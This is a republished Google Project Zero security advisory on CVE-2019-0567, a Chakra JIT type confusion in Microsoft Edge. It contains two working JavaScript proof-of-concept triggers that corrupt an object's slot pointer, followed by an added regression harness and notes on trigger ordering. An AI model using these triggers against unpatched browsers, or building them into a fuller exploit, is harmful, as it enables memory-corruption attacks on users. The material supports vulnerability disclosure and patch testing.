Packet Storm / Google Security Research / PACKETSTORM:151219
Published: Jan 17, 2019

Microsoft Edge Chakra JIT NewScObjectNoCtor / InitProto Type Confusion

Source: Google Security Research (packetstormsecurity.com)

EPSS score: 0.933 (High), percentile 99.1%

`Microsoft Edge: Chakra: JIT: Type confusion via NewScObjectNoCtor or InitProto   
  
CVE-2019-0567  
  
  
The JIT treats the NewScObjectNoCtor and InitProto opcodes as having no side effects. In fact both can have one: each marks an object as a prototype through the type handler's SetIsPrototype method, and that call can transition the object to a new type. Because the JIT does not expect a type transition from these opcodes, the type it checked and cached for the object before the opcode is still trusted by the code that follows, so later property accesses in the JITed code operate on stale type information. This is a type confusion.

In both PoCs the stale store `o.a = value` writes the tagged integer 0x1234 (represented as 0x1000000001234 in 64-bit Chakra) over the pointer to the object's property slots, so the subsequent read of o.a goes through a corrupted pointer.
  
PoC for NewScObjectNoCtor:

function cons() {
}

function opt(o, value) {
    o.b = 1;       // property store: the JIT caches o's type for what follows

    new cons();    // NewScObjectNoCtor; on the final call cons.prototype is o, and
                   // SetIsPrototype transitions o to a new type behind the JIT's back

    o.a = value;   // store compiled against the old type: writes the tagged 0x1234
                   // over the property-slot pointer of the transitioned object
}

function main() {
    // Warm up with throwaway prototypes so opt() is JIT-compiled with
    // NewScObjectNoCtor treated as side-effect free.
    for (let i = 0; i < 2000; i++) {
        cons.prototype = {};

        let o = {a: 1, b: 2};
        opt(o, {});
    }

    let o = {a: 1, b: 2};

    cons.prototype = o;    // now `new cons()` marks o itself as a prototype

    opt(o, 0x1234);

    print(o.a);            // reads through the corrupted slot pointer
}

main();
  
PoC for InitProto:

function opt(o, proto, value) {
    o.b = 1;                      // the JIT caches o's type here

    let tmp = {__proto__: proto}; // InitProto; on the final call proto is o, so
                                  // SetIsPrototype transitions o to a new type

    o.a = value;                  // store compiled against the old type
}

function main() {
    // Warm up with a fresh object as the prototype so opt() is JIT-compiled
    // with InitProto treated as side-effect free.
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, 0x1234);            // o becomes the prototype inside opt()

    print(o.a);                   // reads through the corrupted slot pointer
}

main();
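
The two PoCs above share one trigger shape: warm up a function so the JIT compiles it with a cached type for `o`, then call it once more with `o` itself as the object that the middle statement turns into a prototype. The following regression harness is an added example, not Project Zero's code; the function names `probeNewScObjectNoCtor`, `probeInitProto`, `probeSetPrototypeOfControl` and `runChecks` are assumptions made here. Each probe runs the corresponding PoC pattern and reports whether the final property store still reads back correctly. An unaffected engine (patched ChakraCore, or V8 where the bug never existed) returns `true` for every probe; a vulnerable ChakraCore build does not return `false` but crashes inside the probe while reading `o.a`, because the slot pointer has been overwritten, so a crash must be treated as a failure. The third probe uses `Object.setPrototypeOf`, a path that JITs already treat as side-effecting, as a control: the fix is to make the two opcodes behave the same way.

```javascript
// Added regression harness for CVE-2019-0567 (example code, not the advisory's PoC).
// Run with a ChakraCore `ch` binary or node: `node harness.js`.

const WARMUP = 2000;      // enough iterations for Chakra to JIT-compile opt()
const SENTINEL = 0x1234;  // the value the PoCs store; tagged as 0x1000000001234 in Chakra

// True when the final store o.a = SENTINEL landed in o's real slots and o's
// own layout (a, b) survived the prototype transition.
function intact(o) {
  return o.a === SENTINEL && o.b === 1 && Object.keys(o).join() === 'a,b';
}

// NewScObjectNoCtor path: `new cons()` with cons.prototype === o on the last call.
function probeNewScObjectNoCtor() {
  function cons() {}
  function opt(o, value) {
    o.b = 1;          // JIT caches o's type
    new cons();       // opcode under test: marks cons.prototype as a prototype
    o.a = value;      // store that used stale type info on vulnerable builds
  }
  for (let i = 0; i < WARMUP; i++) {
    cons.prototype = {};
    opt({a: 1, b: 2}, {});
  }
  const o = {a: 1, b: 2};
  cons.prototype = o;
  opt(o, SENTINEL);
  return intact(o);
}

// InitProto path: object literal with __proto__ === o on the last call.
function probeInitProto() {
  function opt(o, proto, value) {
    o.b = 1;                      // JIT caches o's type
    const tmp = {__proto__: proto}; // opcode under test: marks proto as a prototype
    o.a = value;
    return tmp;
  }
  for (let i = 0; i < WARMUP; i++) {
    opt({a: 1, b: 2}, {}, {});
  }
  const o = {a: 1, b: 2};
  opt(o, o, SENTINEL);
  return intact(o);
}

// Control: the same prototype transition through an explicit API call, which the
// JIT already treats as a side effect, so this passes even on a vulnerable build.
function probeSetPrototypeOfControl() {
  function opt(o, proto, value) {
    o.b = 1;
    Object.setPrototypeOf({}, proto);
    o.a = value;
  }
  for (let i = 0; i < WARMUP; i++) {
    opt({a: 1, b: 2}, {}, {});
  }
  const o = {a: 1, b: 2};
  opt(o, o, SENTINEL);
  return intact(o);
}

// Runs every probe and returns a name -> pass map. A vulnerable engine never
// reaches the return: it crashes inside the first failing probe.
function runChecks() {
  return {
    newScObjectNoCtor: probeNewScObjectNoCtor(),
    initProto: probeInitProto(),
    setPrototypeOfControl: probeSetPrototypeOfControl(),
  };
}

console.log(runChecks());
```

Because the JIT only speculates on the type it last saw, the order inside each `opt` matters: the store to `o.b` that seeds the type cache must precede the opcode under test, and the store to `o.a` that consumes the stale type must follow it. Reordering either line removes the trigger even on an unpatched build.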
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available (whichever is earlier), the bug  
report will become visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`